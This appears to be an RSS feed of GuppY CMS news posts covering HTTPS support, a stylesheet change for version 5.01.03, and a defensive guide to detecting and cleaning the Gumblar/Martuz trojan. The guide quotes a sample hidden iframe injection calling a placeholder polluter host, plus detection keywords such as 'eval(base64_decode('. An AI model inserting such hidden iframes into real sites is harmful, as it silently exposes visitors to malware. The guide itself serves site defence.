Sample of RSS -
GuppY: the easy and free web portal that requires no database to run
One of the innovations of the next version of GuppY will be the consideration of the HTTPS secure protocol.
You have probably read in the specialized press that in the near future unsecured sites will no longer be referenced, or less well referenced, dixit Google for example.
We do not give in to a fashion, but we propose it for a greater security of your data, for the protection of your privacy.
Your connections on your site, that of your visitors will be fully encrypted and secure.
In your browser you can see the list of systems used by placing your cursor on the small green padlock when you are on a page in HTTPS.
This protocol can already be activated by mutualisation with certain hosting companies like our partner Nuxit of course, also with OVH and 1 & 1 where we have a domain name for our tests.
Switching to HTTPS induces some constraints, the first is external links, images, videos and documents encapsulated in an iframe that are no longer allowed, only the iframes of the site can be displayed.
Be careful, your entire site must be secure, there can not be mixed content.
The green padlock tells you that communications between your browser and the website are safe. No one can spy on them, and no one can traffic communications. But it does not guarantee anything else!
Be vigilant, and do not entrust any information on any site, padlock or not.
According to the modalities envisaged by your host, in the .htaccess of the root, you will have only a redirection HTTP => HTTPS allowing to return all your visitors to the secured version.
On all official GuppY sites, the HTTPS secure protocol is enabled.
Despite our research, if you see the green padlock with a warning for mixed content, please report us the page.
Important information for the development of skins and customization
The next 5.01.03 Guppy version should be available for download early June, it must bring a lot of new features, changes and corrections.
Of these, a significant change is the removal in all files of all display styles to group in GuppY css files as recommended by all standards.
Our friend Saxbar worked there for several months and we are coming to the end of the corrections, the first tests are very encouraging and we invite you to continue in this direction.
Actually we do not have much choice if we want to continue developing Guppy 5 and be firmly on the path of a modern CMS, always at the forefront of new web technologies. After the release of GuppY 5.01.00 in mid-June 2015, this is another important step.
We are aware of the changes that this implies for skins Guppy, Guppy for users:
- The use of skins compatible with config look is indispensable with some advantages, clicking Generate style refreshments and one or more of the page and your skin will be updated to Version 5.01.03. You will have nothing else to do!
- Customizing the background of your site should be in the file styleplus.css exclusively. If you made changes directly in the style.css file, you have a little over a month to postpone the styleplus.css file. If you do not, you can not update your skin and manually changing the style.css not be possible.
- For the future, for each patch, you can update your skin with one click Build Style.
To date, nearly one hundred skins are compatible Config look, look config usage tutorial will be updated on the Help Centre GuppY before the release of 5.01.03, and of course all the team will be present to help.
Thank you for your loyalty to Guppy, your support is important to us.
The GuppY Team
Following repeated requests on the forum and although GuppY has nothing to do with safety issues related to this worm / Trojan that is known by different names and can attack any site regardless of its programming we give you below some information to fight these nuisances:
* Gumblar, Martuz, Troj / JSRedir-R and others spread over the Internet via infected websites by taking advantage of vulnerabilities in softwares that are not updated by the administrators, webmasters, moderators or editors of sites that have access by FTP.
* Some vulnerabilities have been identified including the Adobe software (Adobe Acrobat Reader, Adobe Flash Player, ...) not updated but it is not excluded that other software not updated may have potential flaws.
* If the Trojan has managed to settle on an administrator's PC, (or a webmaster's, moderator's or editor's) of a site because they have no effective and updated antivirus, it retrieves the FTP access codes of the site and then, of course, any misdeed is possible.
* The site will in turn be polluted by the pirates and will then pollute many others.
How do you realize that the site has been infected?
* If your anti-virus or your anti-spyware displays an alert of iframe attack.
* If Google or another search engine warns you that your site is dangerous.
* If your host blocks the site for that reason.
* If your browser redirects you to a suspicious site or ask if you accept this redirection.
* If you find that new files and / or directories have been installed without your knowledge on your FTP or files weights have changed.
What's going on with the infected site ?
* Files are altered by iframe commands like this:
"<. Iframe src =" http://site_pollueur.cn:8080/index.php "width = 100 height = 150 style =" visibility: hidden "> iframe.> "
This is possible because iframes are often invisible on the site (visibility: hidden)
* In some cases? hackers will install scripts that are more or less powerful, but able still to launch attacks from your site to other sites or even to your server.
* In other cases, part of the code is encoded in Base64 which gives strings like this one:
Qm9uam91cg == which equals Hello
aWZyYW1l which equals iframe
* The most commonly infected files are index files with any extension (html, htm, php ,...), but any files and even images or false image files can be!
What to do in case of infection?
* You must first scan your PC with an effective updated antivirus and/or antispyware. Note that the first antivirus or one of the first to detect and block these attacks is Avast even in its free version. It has then even been laughed at and was charged with generating "false positives".
* Update Windows or whatever OS you have if it is not yet done.
* Update your software (Adobe software in particular).
* Ask all prospective administrators, moderators or editors of your sites to do the same.
As regards disinfection of the site (or sites) themselves if it runs under a Windows PC with a shared hosting:
* Retrieve the local site via FTP and run the antivirus software.
* Search for files that appear to be heavier or to have different weights.
* Search all files for suspicious strings such as iframe, hidden, ... Notepad + +, among others, can do that and compare files with the same name (one original GuppY file from the pack together with a backup file from the polluted site).
* Replace or repair the infected files and remove redundant files.
* Run the antivirus again.
* Change the FTP code -at least the password- if possible from another PC that has not been infected.
* upload again the disinfected files and folders on the server.
* Test the site on line after emptying the cache or the browsers.
If you have access to Linux / Unix console via SSH (in the case of a dedicated server, or a semi-dedicated, virtual, private server (VPS)) or if your website is hosted at home under Linux or Unix:
* You can search on all or part of the server or sites hosted on it, using grep and find commands on the keywords listed above or others such as eval (base64_decode( (but in this case Linux/Unix regulars will manage.
* Update software and ask the other site administrators to do the same.
* Update antivirus and anti spyxwares and ask the other site administrators to do the same.
* Do not save FTP passwords in particular and enter them each time.
* Chmod as many files as possible in 444 (read only) and in particular the index files and even .Htaccess files.
It is important not to chmod this way those files that have to be in read/write mode as data files and others that could not then be edited or incremented.
Another drawback of chmoding into read-only is that they will have to be put back into reading/writing 644-666) to add a patch or do a migration; but is the price to pay for some extra security.
* There are also apps that are capable of eradicating these Trojans but they are usually charged ones.
We have gleaned these explanations here and there ; they are the fruit of our personal experiences and can't by no means be exhaustive, zll the more than malware are constantly changing.
For more information, you need to type one of the keywords below or more of them in Google or your favorite search engine:
Iframe Gumblar Martuz Troj / JSRedir-R
Good luck in case of infections!
JeandePeyrat for GuppY Team.
Commissioning of the automatic creation of twitter son from the Bloggy http://www.freeguppy.org
Last import : 01/12/2021 @ 10:42